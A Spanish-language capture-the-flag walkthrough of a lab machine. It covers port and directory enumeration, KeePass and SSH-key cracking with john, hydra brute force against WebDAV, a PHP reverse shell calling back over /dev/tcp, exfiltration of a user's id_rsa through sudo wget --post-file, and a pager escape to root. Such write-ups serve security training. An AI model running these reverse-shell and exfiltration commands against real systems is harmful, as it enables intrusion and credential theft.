Enumeramos puertos y directorios:
❯ sudo nmap -p- -sS --min-rate 5000 -n -Pn -oG 01-allPorts 192.168.1.51❯ nmap -sCV -p 22,80 -oN 02-targeted.txt 192.168.1.51
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-11 13:38 -03
Nmap scan report for 192.168.1.51
Host is up (0.00028s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 9a:0c:75:5a:bb:bb:06:a2:9a:7d:be:91:ca:45:45:e4 (RSA)
| 256 07:7d:e7:0f:0b:5e:5a:90:e9:33:72:68:49:3b:f5:8c (ECDSA)
|_ 256 6c:15:32:a7:42:e7:9f:da:63:66:7d:3a:be:fb:bf:14 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Apache2 Debian Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.70 seconds❯ gobuster dir -u 'http://192.168.1.51' -w ~/Documentos/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,html,jpg,jpeg,sql,png,xml,zip,sh -r
...
/index.html (Status: 200) [Size: 10701]
/javascript (Status: 403) [Size: 277]
/notes.txt (Status: 200) [Size: 173]
/secrets (Status: 200) [Size: 7]
/webdav (Status: 401) [Size: 459]
...El notes.txt da una pista: las credenciales del recurso están en /secrets, y hay que reemplazar una X por un número de empleado:
❯ cat notes.txt
Hi teo,
the database with your credentials to access the resource are in the secret directory
(Don't forget to change X to your employee number)
regards
IT departmentEnumeramos /secrets y encontramos una base de datos KeePass:
❯ gobuster dir -u 'http://192.168.1.51/secrets' -w ~/Documentos/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt -x sql,db,kdbx -r
...
/db.kdbx (Status: 200) [Size: 2078]
...Crackeamos la contraseña maestra con john:
❯ keepass2john db.kdbx > hash
❯ john -w=/home/wh01s17/Documentos/wordlists/rockyou.txt hash
...
dreams (db)
...Abrimos la base de datos y obtenemos una credencial parcial (con la X que mencionaba la nota):
admin:w3bd4vXXXGeneramos un diccionario sustituyendo las X por números y hacemos fuerza bruta contra el WebDAV:
❯ for num in {100..999}; do echo "w3bd4v$num" >> wordlist.txt; done
❯ hydra -l admin -P wordlist.txt 192.168.1.51 http-get /webdav -t 64
...
[80][http-get] host: 192.168.1.51 login: admin password: w3bd4v513
...WebDAV permite subir archivos, así que subimos una reverse shell PHP:
❯ cat pwned.php
<?php
shell_exec("bash -c 'bash -i >& /dev/tcp/192.168.1.7/1234 0>&1'");
?>
❯ curl -T pwned.php -u admin:w3bd4v513 http://192.168.1.51/webdav/ --digest
...
<p>Resource /webdav/pwned.php has been created.</p>
...
❯ ncat -nlvp 1234
Ncat: Version 7.95 ( https://nmap.org/ncat )
Ncat: Listening on [::]:1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.1.51:43668.
bash: cannot set terminal process group (462): Inappropriate ioctl for device
bash: no job control in this shell
www-data@serve:/var/www/webdav$Para escalar privilegios, revisamos los permisos sudo:
www-data@serve:/tmp$ sudo -l
Matching Defaults entries for www-data on Serve:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User www-data may run the following commands on Serve:
(teo) NOPASSWD: /usr/bin/wgetPodemos ejecutar wget como teo. Abusamos de --post-file para exfiltrar la clave id_rsa de teo hacia nuestra máquina:
❯ nc -lvnp 9999 > id_rsa
www-data@serve:/var/www$ sudo -u teo /usr/bin/wget --post-file=/home/teo/.ssh/id_rsa 192.168.1.7:9999Corregimos el formato de la clave, crackeamos la passphrase y nos conectamos como teo, obteniendo la primera flag:
❯ ssh2john.py id_rsa > hash
❯ john -w=/home/wh01s17/Documentos/wordlists/rockyou.txt hash
...
private (id_rsa)
...
❯ ssh teo@192.168.1.51 -i id_rsa
Enter passphrase for key 'id_rsa': private
Linux serve 4.19.0-18-amd64 #1 SMP Debian 4.19.208-1 (2021-09-29) x86_64
tput: unknown terminal "xterm-kitty"
tput: unknown terminal "xterm-kitty"
tput: unknown terminal "xterm-kitty"
tput: unknown terminal "xterm-kitty"
tput: unknown terminal "xterm-kitty"
tput: unknown terminal "xterm-kitty"
teo@serve:~$Revisamos los permisos sudo de teo:
teo@serve:~$ sudo -l
Matching Defaults entries for teo on Serve:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User teo may run the following commands on Serve:
(root) NOPASSWD: /usr/local/bin/broPodemos ejecutar bro como root, que abre una instancia tipo less con el manual de un comando; desde ahí escapamos a un shell de root:
teo@serve:~$ sudo bro ls
!/bin/bash
root@serve:/home/teo#Obtenemos la flag y fin.